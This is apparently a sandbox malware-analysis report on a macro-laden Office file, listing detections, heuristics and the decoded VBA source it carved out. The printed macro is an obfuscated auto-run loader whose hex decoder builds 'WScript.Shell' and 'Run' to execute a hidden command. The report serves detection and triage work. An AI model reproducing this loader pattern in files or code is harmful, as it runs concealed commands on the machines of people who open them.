MALICIOUS
344
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
The sample contains heavily obfuscated VBA macros, including an auto-exec loader that uses CreateObject and CallByName. The script attempts to execute a command using MJF_("BAB6C6D5CCD3D791B6CBC8CFCF"), which likely decodes to a command to download and execute a second-stage payload. The presence of 'macros.bas' and the ClamAV detection name 'Xls.Malware.Valyria-6700360-0' further indicate malicious intent.
Heuristics 10
-
ClamAV: Xls.Malware.Valyria-6700360-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Xls.Malware.Valyria-6700360-0
-
VBA macros detected medium 6 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADERAuto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
-
Workbook_Open macro high OLE_VBA_WBOPENWorkbook_Open macro
-
CreateObject call high OLE_VBA_CREATEOBJCreateObject call
-
CallByName call high OLE_VBA_CALLBYNAMECallByName call
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 3020 bytes |
SHA-256: 3488b0bc81106b2281c481a20570ce452f07ba93db802d10e608aea2795ec777 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 6 long base64-like blob(s).
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Option Explicit
Private Function ECJIANJYJ() As String
D aECJIANJYJ As String
aECJIANJYJ = "B999D6689999BA9971999F99BB6A99CA999899CD999999998199687999869999879C8F99C2A1AD99999C9999B6D7995E99C3C7999999BA709999999A99995A99997999A162999999999999D999756999A58999D799D2"
Dim myECJIANJYJ = aECJIANJYJ
DimDimMsgBox ((aECJIANJYJ & myECJIANJYJ, 28))
End Function
Public Sub AS_()
Dim CJ_ As Object: Set CJ_ = CreateObject(MJF_("BAB6C6D5CCD3D791B6CBC8CFCF"))
CallByName CJ_, MJF_("B5D8D1"), VbMethod, MJF_(ActiveDocument.Variables("JGDMD").Value), 0, True
End Sub
Private Function QTFVFRWNJ() As String
D aQTFVFRWNJ As String
aQTFVFRWNJ = "B999D6689999BA9971999F99BB6A99CA999899CD999999998199687999869999879C8F99C2A1AD99999C9999B6D7995E99C3C7999999BA709999999A99995A99997999A162999999999999D999756999A58999D799D2"
Dim myQTFVFRWNJ = aQTFVFRWNJ
DimDimMsgBox ((aQTFVFRWNJ & myQTFVFRWNJ, 28))
End Function
Sub EEVHNV_()
AS_
End Sub
Private Function GPKOAKWKX() As String
D aGPKOAKWKX As String
aGPKOAKWKX = "B999D6689999BA9971999F99BB6A99CA999899CD999999998199687999869999879C8F99C2A1AD99999C9999B6D7995E99C3C7999999BA709999999A99995A99997999A162999999999999D999756999A58999D799D2"
Dim myGPKOAKWKX = aGPKOAKWKX
DimDimMsgBox ((aGPKOAKWKX & myGPKOAKWKX, 28))
End Function
Public Sub Document_Open()
Application.Run MJF_("A8A8B9ABB1B9C2")
End Sub
Private Function NEPAZLBJW() As String
D aNEPAZLBJW As String
aNEPAZLBJW = "B999D6689999BA9971999F99BB6A99CA999899CD999999998199687999869999879C8F99C2A1AD99999C9999B6D7995E99C3C7999999BA709999999A99995A99997999A162999999999999D999756999A58999D799D2"
Dim myNEPAZLBJW = aNEPAZLBJW
DimDimMsgBox ((aNEPAZLBJW & myNEPAZLBJW, 28))
End Function
Sub Workbook_Open()
EEVHNV_
End Sub
Private Function DHYBKPGNP() As String
D aDHYBKPGNP As String
aDHYBKPGNP = "B999D6689999BA9971999F99BB6A99CA999899CD999999998199687999869999879C8F99C2A1AD99999C9999B6D7995E99C3C7999999BA709999999A99995A99997999A162999999999999D999756999A58999D799D2"
Dim myDHYBKPGNP = aDHYBKPGNP
DimDimMsgBox ((aDHYBKPGNP & myDHYBKPGNP, 28))
End Function
Public Function MJF_(ByVal CJ_ As String)
Dim NKP_ As String
Dim S_ As Long
For S_ = 1 To Len(CJ_) Step 2
Dim KTW_ As Long: KTW_ = CLng(Chr(38) & Chr(72) & Mid(CJ_, S_, 2))
NKP_ = NKP_ & Chr(KTW_ - 99)
Next
MJF_ = NKP_
End Function
Private Function NEUEPFIHV() As String
D aNEUEPFIHV As String
aNEUEPFIHV = "B999D6689999BA9971999F99BB6A99CA999899CD999999998199687999869999879C8F99C2A1AD99999C9999B6D7995E99C3C7999999BA709999999A99995A99997999A162999999999999D999756999A58999D799D2"
Dim myNEUEPFIHV = aNEUEPFIHV
DimDimMsgBox ((aNEUEPFIHV & myNEUEPFIHV, 28))
End Function
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.